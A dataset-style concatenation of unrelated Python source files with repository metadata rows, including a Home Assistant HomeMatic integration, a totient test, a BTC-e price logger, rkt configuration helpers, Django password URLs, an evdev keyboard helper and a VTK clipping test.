'ip': socket.gethostbyname(sconfig.get(CONF_HOST)),
'port': DEFAULT_PORT,
'username': sconfig.get(CONF_USERNAME),
'password': sconfig.get(CONF_PASSWORD),
'connect': False,
}
# Create server thread
bound_system_callback = partial(_system_callback_handler, hass, config)
hass.data[DATA_HOMEMATIC] = homematic = HMConnection(
local=config[DOMAIN].get(CONF_LOCAL_IP),
localport=config[DOMAIN].get(CONF_LOCAL_PORT, DEFAULT_LOCAL_PORT),
remotes=remotes,
systemcallback=bound_system_callback,
interface_id='homeassistant'
)
# Start server thread, connect to hosts, initialize to receive events
homematic.start()
# Stops server when HASS is shutting down
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP, hass.data[DATA_HOMEMATIC].stop)
# Init homematic hubs
entity_hubs = []
for hub_name in conf[CONF_HOSTS].keys():
entity_hubs.append(HMHub(hass, homematic, hub_name))
def _hm_service_virtualkey(service):
"""Service to handle virtualkey servicecalls."""
address = service.data.get(ATTR_ADDRESS)
channel = service.data.get(ATTR_CHANNEL)
param = service.data.get(ATTR_PARAM)
# Device not found
hmdevice = _device_from_servicecall(hass, service)
if hmdevice is None:
_LOGGER.error("%s not found for service virtualkey!", address)
return
# Parameter doesn't exist for device
if param not in hmdevice.ACTIONNODE:
_LOGGER.error("%s not datapoint in hm device %s", param, address)
return
# Channel doesn't exist for device
if channel not in hmdevice.ACTIONNODE[param]:
_LOGGER.error("%i is not a channel in hm device %s",
channel, address)
return
# Call parameter
hmdevice.actionNodeData(param, True, channel)
hass.services.register(
DOMAIN, SERVICE_VIRTUALKEY, _hm_service_virtualkey,
schema=SCHEMA_SERVICE_VIRTUALKEY)
def _service_handle_value(service):
"""Service to call setValue method for HomeMatic system variable."""
entity_ids = service.data.get(ATTR_ENTITY_ID)
name = service.data[ATTR_NAME]
value = service.data[ATTR_VALUE]
if entity_ids:
entities = [entity for entity in entity_hubs if
entity.entity_id in entity_ids]
else:
entities = entity_hubs
if not entities:
_LOGGER.error("No HomeMatic hubs available")
return
for hub in entities:
hub.hm_set_variable(name, value)
hass.services.register(
DOMAIN, SERVICE_SET_VARIABLE_VALUE, _service_handle_value,
schema=SCHEMA_SERVICE_SET_VARIABLE_VALUE)
def _service_handle_reconnect(service):
"""Service to reconnect all HomeMatic hubs."""
homematic.reconnect()
hass.services.register(
DOMAIN, SERVICE_RECONNECT, _service_handle_reconnect,
schema=SCHEMA_SERVICE_RECONNECT)
def _service_handle_device(service):
"""Service to call setValue method for HomeMatic devices."""
address = service.data.get(ATTR_ADDRESS)
channel = service.data.get(ATTR_CHANNEL)
param = service.data.get(ATTR_PARAM)
value = service.data.get(ATTR_VALUE)
# Device not found
hmdevice = _device_from_servicecall(hass, service)
if hmdevice is None:
_LOGGER.error("%s not found!", address)
return
hmdevice.setValue(param, value, channel)
hass.services.register(
DOMAIN, SERVICE_SET_DEVICE_VALUE, _service_handle_device,
schema=SCHEMA_SERVICE_SET_DEVICE_VALUE)
def _service_handle_install_mode(service):
"""Service to set interface into install mode."""
interface = service.data.get(ATTR_INTERFACE)
mode = service.data.get(ATTR_MODE)
time = service.data.get(ATTR_TIME)
address = service.data.get(ATTR_ADDRESS)
homematic.setInstallMode(interface, t=time, mode=mode, address=address)
hass.services.register(
DOMAIN, SERVICE_SET_INSTALL_MODE, _service_handle_install_mode,
schema=SCHEMA_SERVICE_SET_INSTALL_MODE)
def _service_put_paramset(service):
"""Service to call the putParamset method on a HomeMatic connection."""
interface = service.data.get(ATTR_INTERFACE)
address = service.data.get(ATTR_ADDRESS)
paramset_key = service.data.get(ATTR_PARAMSET_KEY)
# When passing in the paramset from a YAML file we get an OrderedDict
# here instead of a dict, so add this explicit cast.
# The service schema makes sure that this cast works.
paramset = dict(service.data.get(ATTR_PARAMSET))
_LOGGER.debug(
"Calling putParamset: %s, %s, %s, %s",
interface, address, paramset_key, paramset
)
homematic.putParamset(interface, address, paramset_key, paramset)
hass.services.register(
DOMAIN, SERVICE_PUT_PARAMSET, _service_put_paramset,
schema=SCHEMA_SERVICE_PUT_PARAMSET)
return True
def _system_callback_handler(hass, config, src, *args):
"""System callback handler."""
# New devices available at hub
if src == 'newDevices':
(interface_id, dev_descriptions) = args
interface = interface_id.split('-')[-1]
# Device support active?
if not hass.data[DATA_CONF][interface]['connect']:
return
addresses = []
for dev in dev_descriptions:
address = dev['ADDRESS'].split(':')[0]
if address not in hass.data[DATA_STORE]:
hass.data[DATA_STORE].add(address)
addresses.append(address)
# Register EVENTS
# Search all devices with an EVENTNODE that includes data
bound_event_callback = partial(_hm_event_handler, hass, interface)
for dev in addresses:
hmdevice = hass.data[DATA_HOMEMATIC].devices[interface].get(dev)
if hmdevice.EVENTNODE:
hmdevice.setEventCallback(
callback=bound_event_callback, bequeath=True)
# Create HASS entities
if addresses:
for component_name, discovery_type in (
('switch', DISCOVER_SWITCHES),
('light', DISCOVER_LIGHTS),
('cover', DISCOVER_COVER),
('binary_sensor', DISCOVER_BINARY_SENSORS),
('sensor', DISCOVER_SENSORS),
('climate', DISCOVER_CLIMATE),
('lock', DISCOVER_LOCKS)):
# Get all devices of a specific type
found_devices = _get_devices(
hass, discovery_type, addresses, interface)
# When devices of this type are found
# they are setup in HASS and a discovery event is fired
if found_devices:
discovery.load_platform(hass, component_name, DOMAIN, {
ATTR_DISCOVER_DEVICES: found_devices
}, config)
# Homegear error message
elif src == 'error':
_LOGGER.error("Error: %s", args)
(interface_id, errorcode, message) = args
hass.bus.fire(EVENT_ERROR, {
ATTR_ERRORCODE: errorcode,
ATTR_MESSAGE: message
})
def _get_devices(hass, discovery_type, keys, interface):
"""Get the HomeMatic devices for given discovery_type."""
device_arr = []
for key in keys:
device = hass.data[DATA_HOMEMATIC].devices[interface][key]
class_name = device.__class__.__name__
metadata = {}
# Class not supported by discovery type
if class_name not in HM_DEVICE_TYPES[discovery_type]:
continue
# Load metadata needed to generate a parameter list
if discovery_type == DISCOVER_SENSORS:
metadata.update(device.SENSORNODE)
elif discovery_type == DISCOVER_BINARY_SENSORS:
metadata.update(device.BINARYNODE)
else:
metadata.update({None: device.ELEMENT})
# Generate options for 1...n elements with 1...n parameters
for param, channels in metadata.items():
if param in HM_IGNORE_DISCOVERY_NODE and class_name not in \
HM_IGNORE_DISCOVERY_NODE_EXCEPTIONS.get(param, []):
continue
# Add devices
_LOGGER.debug("%s: Handling %s: %s: %s",
discovery_type, key, param, channels)
for channel in channels:
name = _create_ha_id(
name=device.NAME, channel=channel, param=param,
count=len(channels)
)
unique_id = _create_ha_id(
name=key, channel=channel, param=param,
count=len(channels)
)
device_dict = {
CONF_PLATFORM: "homematic",
ATTR_ADDRESS: key,
ATTR_INTERFACE: interface,
ATTR_NAME: name,
ATTR_CHANNEL: channel,
ATTR_UNIQUE_ID: unique_id
}
if param is not None:
device_dict[ATTR_PARAM] = param
# Add new device
try:
DEVICE_SCHEMA(device_dict)
device_arr.append(device_dict)
except vol.MultipleInvalid as err:
_LOGGER.error("Invalid device config: %s",
str(err))
return device_arr
def _create_ha_id(name, channel, param, count):
"""Generate a unique entity id."""
# HMDevice is a simple device
if count == 1 and param is None:
return name
# Has multiple elements/channels
if count > 1 and param is None:
return "{} {}".format(name, channel)
# With multiple parameters on first channel
if count == 1 and param is not None:
return "{} {}".format(name, param)
# Multiple parameters with multiple channels
if count > 1 and param is not None:
return "{} {} {}".format(name, channel, param)
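# Illustration (added, derived from the branches above) for a device named
# "Sensor":
#   _create_ha_id("Sensor", 1, None, 1)         -> "Sensor"
#   _create_ha_id("Sensor", 2, None, 3)         -> "Sensor 2"
#   _create_ha_id("Sensor", 1, "LOWBAT", 1)     -> "Sensor LOWBAT"
#   _create_ha_id("Sensor", 2, "LOWBAT", 3)     -> "Sensor 2 LOWBAT"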
def _hm_event_handler(hass, interface, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
try:
channel = int(device.split(":")[1])
address = device.split(":")[0]
hmdevice = hass.data[DATA_HOMEMATIC].devices[interface].get(address)
except (TypeError, ValueError):
_LOGGER.error("Event handling channel convert error!")
return
# Return if not an event supported by device
if attribute not in hmdevice.EVENTNODE:
return
_LOGGER.debug("Event %s for %s channel %i", attribute,
hmdevice.NAME, channel)
# Keypress event
if attribute in HM_PRESS_EVENTS:
hass.bus.fire(EVENT_KEYPRESS, {
ATTR_NAME: hmdevice.NAME,
ATTR_PARAM: attribute,
ATTR_CHANNEL: channel
})
return
# Impulse event
if attribute in HM_IMPULSE_EVENTS:
hass.bus.fire(EVENT_IMPULSE, {
ATTR_NAME: hmdevice.NAME,
ATTR_CHANNEL: channel
})
return
_LOGGER.warning("Event is unknown and not forwarded")
def _device_from_servicecall(hass, service):
"""Extract HomeMatic device from service call."""
address = service.data.get(ATTR_ADDRESS)
interface = service.data.get(ATTR_INTERFACE)
if address == 'BIDCOS-RF':
address = 'BidCoS-RF'
if interface:
return hass.data[DATA_HOMEMATIC].devices[interface].get(address)
for devices in hass.data[DATA_HOMEMATIC].devices.values():
if address in devices:
return devices[address]
class HMHub(Entity):
"""The HomeMatic hub. (CCU2/HomeGear)."""
def __init__(self, hass, homematic, name):
"""Initialize HomeMatic hub."""
self.hass = hass
self.entity_id = "{}.{}".format(DOMAIN, name.lower())
self._homematic = homematic
self._variables = {}
self._name = name
self._state = None
# Load data
self.hass.helpers.event.track_time_interval(
self._update_hub, SCAN_INTERVAL_HUB)
self.hass.add_job(self._update_hub, None)
self.hass.helpers.event.track_time_interval(
self._update_variables, SCAN_INTERVAL_VARIABLES)
self.hass.add_job(self._update_variables, None)
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def should_poll(self):
"""Return false. HomeMatic Hub object updates variables."""
return False
@property
def state(self):
"""Return the state of the entity."""
return self._state
@property
def state_attributes(self):
"""Return the state attributes."""
attr = self._variables.copy()
return attr
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
return "mdi:gradient"
def _update_hub(self, now):
"""Retrieve latest state."""
service_message = self._homematic.getServiceMessages(self._name)
state = None if service_message is None else len(service_message)
# state have change?
if self._state != state:
self._state = state
self.schedule_update_ha_state()
def _update_variables(self, now):
"""Retrieve all variable data and update hmvariable states."""
variables = self._homematic.getAllSystemVariables(self._name)
if variables is None:
return
state_change = False
for key, value in variables.items():
if key in self._variables and value == self._variables[key]:
continue
state_change = True
self._variables.update({key: value})
if state_change:
self.schedule_update_ha_state()
def hm_set_variable(self, name, value):
"""Set variable value on CCU/Homegear."""
if name not in self._variables:
_LOGGER.error("Variable %s not found on %s", name, self.name)
return
old_value = self._variables.get(name)
if isinstance(old_value, bool):
value = cv.boolean(value)
else:
value = float(value)
self._homematic.setSystemVariable(self.name, name, value)
self._variables.update({name: value})
self.schedule_update_ha_state()
class HMDevice(Entity):
"""The HomeMatic device base object."""
def __init__(self, config):
"""Initialize a generic HomeMatic device."""
self._name = config.get(ATTR_NAME)
self._address = config.get(ATTR_ADDRESS)
self._interface = config.get(ATTR_INTERFACE)
self._channel = config.get(ATTR_CHANNEL)
self._state = config.get(ATTR_PARAM)
self._unique_id = config.get(ATTR_UNIQUE_ID)
self._data = {}
self._homematic = None
self._hmdevice = None
self._connected = False
self._available = False
# Set parameter to uppercase
if self._state:
self._state = self._state.upper()
async def async_added_to_hass(self):
"""Load data init callbacks."""
await self.hass.async_add_job(self.link_homematic)
@property
def unique_id(self):
"""Return unique ID. HomeMatic entity IDs are unique by default."""
return self._unique_id.replace(" ", "_")
@property
def should_poll(self):
"""Return false. HomeMatic states are pushed by the XML-RPC Server."""
return False
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def available(self):
"""Return true if device is available."""
return self._available
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
attr = {}
# Generate a dictionary with attributes
for node, data in HM_ATTRIBUTE_SUPPORT.items():
# Is an attribute and exists for this object
if node in self._data:
value = data[1].get(self._data[node], self._data[node])
attr[data[0]] = value
# Static attributes
attr['id'] = self._hmdevice.ADDRESS
attr['interface'] = self._interface
return attr
def link_homematic(self):
"""Connect to HomeMatic."""
if self._connected:
return True
# Initialize
self._homematic = self.hass.data[DATA_HOMEMATIC]
self._hmdevice = \
self._homematic.devices[self._interface][self._address]
self._connected = True
try:
# Initialize datapoints of this object
self._init_data()
self._load_data_from_hm()
# Link events from pyhomematic
self._subscribe_homematic_events()
self._available = not self._hmdevice.UNREACH
except Exception as err: # pylint: disable=broad-except
self._connected = False
_LOGGER.error("Exception while linking %s: %s",
self._address, str(err))
def _hm_event_callback(self, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
_LOGGER.debug("%s received event '%s' value: %s", self._name,
attribute, value)
has_changed = False
# Is data needed for this instance?
if attribute in self._data:
# Did data change?
if self._data[attribute] != value:
self._data[attribute] = value
has_changed = True
# Availability has changed
if self.available != (not self._hmdevice.UNREACH):
self._available = not self._hmdevice.UNREACH
has_changed = True
# If it has changed data point, update HASS
if has_changed:
self.schedule_update_ha_state()
def _subscribe_homematic_events(self):
"""Subscribe all required events to handle job."""
channels_to_sub = set()
# Push data to channels_to_sub from hmdevice metadata
for metadata in (self._hmdevice.SENSORNODE, self._hmdevice.BINARYNODE,
self._hmdevice.ATTRIBUTENODE,
self._hmdevice.WRITENODE, self._hmdevice.EVENTNODE,
self._hmdevice.ACTIONNODE):
for node, channels in metadata.items():
# Data is needed for this instance
if node in self._data:
# chan is current channel
if len(channels) == 1:
channel = channels[0]
else:
channel = self._channel
# Prepare for subscription
try:
channels_to_sub.add(int(channel))
except (ValueError, TypeError):
_LOGGER.error("Invalid channel in metadata from %s",
self._name)
# Set callbacks
for channel in channels_to_sub:
_LOGGER.debug(
"Subscribe channel %d from %s", channel, self._name)
self._hmdevice.setEventCallback(
callback=self._hm_event_callback, bequeath=False,
channel=channel)
def _load_data_from_hm(self):
"""Load first value from pyhomematic."""
if not self._connected:
return False
# Read data from pyhomematic
for metadata, funct in (
(self._hmdevice.ATTRIBUTENODE,
self._hmdevice.getAttributeData),
(self._hmdevice.WRITENODE, self._hmdevice.getWriteData),
(self._hmdevice.SENSORNODE, self._hmdevice.getSensorData),
(self._hmdevice.BINARYNODE, self._hmdevice.getBinaryData)):
for node in metadata:
if metadata[node] and node in self._data:
self._data[node] = funct(name=node, channel=self._channel)
return True
def _hm_set_state(self, value):
"""Set data to main datapoint."""
if self._state in self._data:
self._data[self._state] = value
def _hm_get_state(self):
"""Get data from main datapoint."""
if self._state in self._data:
return self._data[self._state]
return None
def _init_data(self):
"""Generate a data dict (self._data) from the HomeMatic metadata."""
# Add all attributes to data dictionary
for data_note in self._hmdevice.ATTRIBUTENODE:
self._data.update({data_note: STATE_UNKNOWN})
# Initialize device specific data
self._init_data_struct()
def _init_data_struct(self):
"""Generate a data dictionary from the HomeMatic device metadata."""
raise NotImplementedError
| 34.840449 | 79 | 0.627354 |
4a27da033fe99116e80f26987518a3c68e02146b | 322 | py | Python | project_euler/library/number_theory/test_euler_totient.py | cryvate/project-euler | 6ed13880d7916c34554559f5f71662a863735eda | [
"MIT"
] | null | null | null | project_euler/library/number_theory/test_euler_totient.py | cryvate/project-euler | 6ed13880d7916c34554559f5f71662a863735eda | [
"MIT"
] | 9 | 2017-02-20T23:41:40.000Z | 2017-04-16T15:36:54.000Z | project_euler/library/number_theory/test_euler_totient.py | cryvate/project-euler | 6ed13880d7916c34554559f5f71662a863735eda | [
"MIT"
] | null | null | null |
import pytest
from .euler_totient import phi, phi_range
from .gcd import gcd
@pytest.mark.parametrize('n', range(100, 115))
def test_phi(n: int) -> None:
assert phi(n) == len([a for a in range(n) if gcd(a, n) == 1])
def test_phi_range(n: int=100):
assert [phi(n) for n in range(1, n + 1)] == phi_range(n)[1:]
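# Worked example (illustration; assumes phi_range(n) covers 0..n as the test
# above implies): phi(10) counts {1, 3, 7, 9}, so phi(10) == 4 and
# phi_range(10)[1:] == [1, 1, 2, 2, 4, 2, 6, 4, 6, 4].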
| 23 | 65 | 0.645963 |
4a27ddee11e3f0341ecce51046ba415d44b78ab6 | 595 | py | Python | parser/functions/help.py | UHH-ISS/honeygrove-console | 9ff7bd1ab9609276fa4008d0180fdeb500fb9484 | [
"MIT"
] | 1 | 2019-03-12T16:35:33.000Z | 2019-03-12T16:35:33.000Z | parser/functions/help.py | UHH-ISS/honeygrove-console | 9ff7bd1ab9609276fa4008d0180fdeb500fb9484 | [
"MIT"
] | null | null | null | parser/functions/help.py | UHH-ISS/honeygrove-console | 9ff7bd1ab9609276fa4008d0180fdeb500fb9484 | [
"MIT"
] | null | null | null |
def help(parser,logic,logging,args=0):
if args:
for k in args[0]:
try:
with open("parser/functions/help/" + str(k) + ".txt") as f:
for line in f:
parser.print(line[:len(line)-1])
except IOError as e:
parser.print(k+":command unknown")
else:
with open("parser/functions/help/help.txt") as f:
for line in f:
if line in ["\n","\r\n"]:
parser.print()
else:
parser.print(line[:len(line)-1])
| 33.055556 | 75 | 0.440336 |
4a27ddffd07c9efa007b7b70c6ac6947e91e0fba | 4,616 | py | Python | pyTrader/trade_stream.py | evanhenri/neural-network-trading-bot | a75b6c118c67ba6e00cffe68b04cbb424c759b3e | [
"MIT"
] | 18 | 2016-05-31T09:32:20.000Z | 2021-08-15T17:41:14.000Z | pyTrader/trade_stream.py | nav3van/RNN-Trading-Bot | a75b6c118c67ba6e00cffe68b04cbb424c759b3e | [
"MIT"
] | 2 | 2016-06-19T14:12:37.000Z | 2017-03-28T23:18:50.000Z | pyTrader/trade_stream.py | nav3van/RNN-Trading-Bot | a75b6c118c67ba6e00cffe68b04cbb424c759b3e | [
"MIT"
] | 9 | 2016-02-15T12:50:48.000Z | 2020-03-18T03:31:22.000Z |
import os, sys, time, datetime
import urllib.request, urllib.parse, json, codecs, socket
from file_check import parent_dir
# Dynamically imports the class required for the extension returned by get_output_type
# Returns the name of the class and the imported module containing that class
def import_class_module():
module = 'sqlite_output'
temp_class_name = 'sqlite_obj'
temp_imported_class = __import__(module, fromlist=temp_class_name)
return temp_class_name, temp_imported_class
# Continue asking user for input if an entry that does not correlate to an index of _extension_list is entered
# Return user entry once a valid input has been made
def get_user_input(_extension_list):
while True:
try:
usr_input = int(input())
except ValueError:
print('***Invalid Input***\nEnter a number from 0 to ' + str(len(_extension_list) - 1) + ' inclusive')
continue
else:
if usr_input < 0 or usr_input >= len(_extension_list):
print('***Invalid Input***\nEnter a number from 0 to ' + str(len(_extension_list) - 1) + ' inclusive')
else:
return usr_input
# Returns true if api response contains valid data and false otherwise
def valid_response(_json_resp):
err_originator_desc = 'json response validation'
try:
if 'btc_usd' not in _json_resp:
return False
except ValueError as e:
store_log([err_originator_desc,e])
return True
# Returns BTC-e API response with current exchange rates
def http_request():
max_requests = 10
# Specifies how long a socket should wait for a response before timing out
socket.setdefaulttimeout(socket_timeout)
while max_requests > 0:
try:
api_request = urllib.request.Request(url, headers=headers)
api_response = urllib.request.urlopen(api_request)
json_response = json.load(reader(api_response))
if valid_response(json_response):
return json_response
else:
store_log(['***Bad response***', str(json_response)])
except urllib.request.HTTPError as e:
print('\nInvalid API response received, attempts remaining: ' + str(max_requests))
store_log(['receiving api response', e])
except Exception as e:
print('\nInvalid API response received, attempts remaining: ' + str(max_requests))
store_log(['api request', e])
max_requests -= 1
time.sleep(2)
print('***API request threshold met with no valid responses received***')
def get_trade_data():
while True:
json_obj = http_request()
g_output_object.open_output_file()
timestamp = datetime.datetime.fromtimestamp(int(json_obj['btc_usd']['updated'])).strftime('%Y%m%d%H%M%S')
g_output_object.store_output(timestamp, json_obj['btc_usd']['sell'], json_obj['btc_usd']['buy'])
sys.stdout.write("\rTrade record count = %i" % g_output_object.record_count())
sys.stdout.flush()
time.sleep(2)
def store_log(_argv):
with open(parent_dir + 'build/data/error.log', 'a+') as log_file:
log_file.write('\n/-------------------\\\n')
for argc in _argv:
if argc == _argv[0]:
log_file.write('Error occurred during ' + argc + ' at ' + str(datetime.datetime.now()))
else:
log_file.write(str(argc))
log_file.write('\n\\-------------------/\n')
log_file.close()
current_dir_path = os.path.realpath(os.path.dirname(''))
out_dir_path = parent_dir + 'build/data/'
out_file_name = 'input.sqlite'
socket_timeout = 15
url = 'https://btc-e.com/api/3/ticker/btc_usd'
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17'}
reader = codecs.getreader('utf-8')
def main():
class_name, imported_class = import_class_module()
mod_attr = getattr(imported_class, class_name)
output_path = out_dir_path + out_file_name
global g_output_object
g_output_object = mod_attr(output_path)
# http_request() is wrapped in an infinite loop. If an exception is encountered during http_request(),
# the local infinite loop within that function will break. However, the infinite loop below will prevent
# execution from stopping.
while True:
get_trade_data()
store_log(['http_request() infinite loop', ['Pausing for 2 seconds before re-initiating request sequence']])
time.sleep(2)
if __name__ == '__main__':
main()
| 37.225806 | 130 | 0.660745 |
4a27de18ec7994b8a36402ede71dde14dc6b4a7a | 2,303 | py | Python | runtime/config.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 11 | 2017-11-06T08:42:55.000Z | 2021-01-08T11:01:02.000Z | runtime/config.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 7 | 2017-12-28T12:05:50.000Z | 2021-04-02T15:04:46.000Z | runtime/config.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 4 | 2017-11-08T10:03:31.000Z | 2018-06-03T17:59:43.000Z | #! /usr/bin/env python3
import json
import os
def rkt_path_d(path):
rkt_data = "/tmp/rkt-data"
data = {
"rktKind": "paths",
"rktVersion": "v1",
"data": rkt_data,
"stage1-images": "%s/rkt" % path
}
try:
os.makedirs("%s/paths.d/" % path)
except OSError:
pass
try:
os.makedirs(rkt_data)
except OSError:
pass
with open("%s/paths.d/paths.json" % path, "w") as f:
json.dump(data, f)
def rkt_stage1_d(path):
data = {
"rktKind": "stage1",
"rktVersion": "v1",
"name": "coreos.com/rkt/stage1-coreos",
"version": "v1.27.0",
"location": "%s/rkt/stage1-coreos.aci" % path
}
try:
os.makedirs("%s/stage1.d/" % path)
except OSError:
pass
with open("%s/stage1.d/coreos.json" % path, "w") as f:
json.dump(data, f)
def dgr_config(path):
data = [
"targetWorkDir: %s/target" % path,
"rkt:",
" path: %s/rkt/rkt" % path,
" insecureOptions: [http, image]",
" dir: %s/data" % path,
" localConfig: %s" % path,
" systemConfig: %s" % path,
" userConfig: %s" % path,
" trustKeysFromHttps: false",
" noStore: false",
" storeOnly: false",
"push:",
' url: "http://enjoliver.local"',
]
with open("%s/config.yml" % path, "w") as f:
f.write("\n".join(data) + "\n")
def acserver_config(path):
data = [
"api:",
" serverName: enjoliver.local",
" port: 80",
"storage:",
" unsigned: true",
" allowOverride: true",
' rootPath: %s/acserver.d' % path,
]
with open("%s/ac-config.yml" % path, "w") as f:
f.write("\n".join(data) + "\n")
with open("/etc/hosts") as f:
for l in f:
if "enjoliver.local" in l:
return
try:
with open("/etc/hosts", 'a') as f:
f.write("172.20.0.1 enjoliver.local # added by %s\n" % os.path.abspath(__file__))
except IOError:
print("/etc/hosts ignore: run as sudo")
if __name__ == "__main__":
pwd = os.path.dirname(os.path.abspath(__file__))
rkt_path_d(pwd)
rkt_stage1_d(pwd)
dgr_config(pwd)
acserver_config(pwd)
| 24.763441 | 93 | 0.508467 |
4a27dfb560d1dd57b6f7ca7ec4fcd258965e5c3a | 606 | py | Python | Cuatrimestres/1/TeoriadeControlI/python/trayectoriafiltrada.py | chelizalde/DCA | 34fd4d500117a9c0a75b979b8b0f121c1992b9dc | [
"MIT"
] | null | null | null | Cuatrimestres/1/TeoriadeControlI/python/trayectoriafiltrada.py | chelizalde/DCA | 34fd4d500117a9c0a75b979b8b0f121c1992b9dc | [
"MIT"
] | null | null | null | Cuatrimestres/1/TeoriadeControlI/python/trayectoriafiltrada.py | chelizalde/DCA | 34fd4d500117a9c0a75b979b8b0f121c1992b9dc | [
"MIT"
] | 1 | 2021-03-20T12:44:13.000Z | 2021-03-20T12:44:13.000Z | #!/usr/bin/env python
from matplotlib.pyplot import plot, text, axis, grid, gca, xticks, yticks, savefig
from numpy import exp, abs, linspace, sin
x = linspace(0, 1.2, 200)
fun = exp(-4.5*x)*(1-sin(13*x))
env = exp(-3*x) + 0.1  # exponential envelope; renamed so it does not shadow numpy's exp
plot(x, fun)
plot(x, env)
text(0.22, 0.15, r'$\xi(t)$', fontsize=28)
text(0.425, 0.425, r'$k e^{-\alpha t}$', fontsize=28)
axis([-0.2, 1.2, -0.2, 1.2])
grid(True)
xticks([0])
yticks([0])
a = gca()
a.set_xticklabels([])
a.set_yticklabels([])
# Save the figure in the same folder
savefig("trayectoriafiltrada.pdf", bbox_inches='tight', pad_inches=0, transparent="True")
| 23.307692 | 89 | 0.653465 |
4a27e0b7767999ba6bbb28b8529830843554582f | 1,086 | py | Python | password_policies/urls.py | BuildingRobotics/django-password-policies | 8b754ca8d10a4cf2b56a8c5f9e46f5384f492eb9 | [
"BSD-3-Clause"
] | null | null | null | password_policies/urls.py | BuildingRobotics/django-password-policies | 8b754ca8d10a4cf2b56a8c5f9e46f5384f492eb9 | [
"BSD-3-Clause"
] | 1 | 2019-09-17T10:09:29.000Z | 2019-09-17T16:56:54.000Z | password_policies/urls.py | BuildingRobotics/django-password-policies | 8b754ca8d10a4cf2b56a8c5f9e46f5384f492eb9 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
from django.conf.urls import url
from password_policies.views import PasswordChangeFormView
from password_policies.views import PasswordChangeDoneView
from password_policies.views import PasswordResetCompleteView
from password_policies.views import PasswordResetConfirmView
from password_policies.views import PasswordResetFormView
from password_policies.views import PasswordResetDoneView
urlpatterns = [
url(r'^change/done/$', PasswordChangeDoneView.as_view(),
name="password_change_done"),
url(r'^change/$', PasswordChangeFormView.as_view(), name="password_change"),
url(r'^reset/$', PasswordResetFormView.as_view(), name="password_reset"),
url(r'^reset/complete/$', PasswordResetCompleteView.as_view(),
name="password_reset_complete"),
url(r'^reset/confirm/([0-9A-Za-z_\-]+)/([0-9A-Za-z]{1,13})/([0-9A-Za-z-=_]{1,32})/$',
PasswordResetConfirmView.as_view(),
name="password_reset_confirm"),
url(r'^reset/done/$', PasswordResetDoneView.as_view(),
name="password_reset_done"),
]
| 43.44 | 89 | 0.754144 |
4a27e11eb834c0d073b2977c55c63d8a636565c8 | 719 | py | Python | src/bin/device.py | a-t-0/python-keyboard-drivers | 47535bf8cafb4c10ffba653be8fed3712d05de57 | [
"BSD-2-Clause"
] | 2 | 2018-08-25T09:45:55.000Z | 2021-03-04T14:20:06.000Z | src/bin/device.py | a-t-0/python-keyboard-drivers | 47535bf8cafb4c10ffba653be8fed3712d05de57 | [
"BSD-2-Clause"
] | null | null | null | src/bin/device.py | a-t-0/python-keyboard-drivers | 47535bf8cafb4c10ffba653be8fed3712d05de57 | [
"BSD-2-Clause"
] | 1 | 2021-03-04T14:59:40.000Z | 2021-03-04T14:59:40.000Z |
"""
See LICENSE for more information.
See README.md for building instructions
and usage examples.
"""
import evdev # communicate with the kernel I/O interface
import sys # access system calls
class DEVICE (object):
def __init__ (self):
self.device_file = '/dev/input/event5'
# create kernel interface
self.device = evdev.InputDevice(self.device_file)
def _detach_kernel_driver (self):
"""
		tell the kernel to release control of the device
"""
self.device.grab()
def _attach_kernel_driver (self):
"""
tell the kernel to take back control of the device
"""
self.device.ungrab()
def _exit (self):
"""
call the exit sys-call and cleanup
"""
self._attach_kernel_driver()
sys.exit(0)
| 18.435897 | 52 | 0.703755 |
4a27e1a35d2f427467f736dd00edc6996919d915 | 34,625 | py | Python | Filters/General/Testing/Python/clipQuadraticCells.py | jasper-yeh/VtkDotNet | 84b56f781cb511694e4380cebfb245bbefe2560b | [
"BSD-3-Clause"
] | 3 | 2020-06-20T23:31:06.000Z | 2021-01-11T02:17:16.000Z | Filters/General/Testing/Python/clipQuadraticCells.py | jasper-yeh/VtkDotNet | 84b56f781cb511694e4380cebfb245bbefe2560b | [
"BSD-3-Clause"
] | 1 | 2020-12-01T23:21:02.000Z | 2020-12-02T23:44:43.000Z | Filters/General/Testing/Python/clipQuadraticCells.py | jasper-yeh/VtkDotNet | 84b56f781cb511694e4380cebfb245bbefe2560b | [
"BSD-3-Clause"
] | 5 | 2015-10-09T04:12:29.000Z | 2021-12-15T16:57:11.000Z | #!/usr/bin/env python
import sys
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Prevent .pyc files being created.
# Stops the vtk source being polluted
# by .pyc files.
sys.dont_write_bytecode = True
import backdrop
# clip every quadratic cell type
# Create a scene with one of each cell type.
# QuadraticEdge
edgePoints = vtk.vtkPoints()
edgePoints.SetNumberOfPoints(3)
edgePoints.InsertPoint(0, 0, 0, 0)
edgePoints.InsertPoint(1, 1.0, 0, 0)
edgePoints.InsertPoint(2, 0.5, 0.25, 0)
edgeScalars = vtk.vtkFloatArray()
edgeScalars.SetNumberOfTuples(3)
edgeScalars.InsertValue(0, 0.0)
edgeScalars.InsertValue(1, 0.0)
edgeScalars.InsertValue(2, 0.9)
aEdge = vtk.vtkQuadraticEdge()
aEdge.GetPointIds().SetId(0, 0)
aEdge.GetPointIds().SetId(1, 1)
aEdge.GetPointIds().SetId(2, 2)
aEdgeGrid = vtk.vtkUnstructuredGrid()
aEdgeGrid.Allocate(1, 1)
aEdgeGrid.InsertNextCell(aEdge.GetCellType(), aEdge.GetPointIds())
aEdgeGrid.SetPoints(edgePoints)
aEdgeGrid.GetPointData().SetScalars(edgeScalars)
edgeclips = vtk.vtkClipDataSet()
edgeclips.SetInputData(aEdgeGrid)
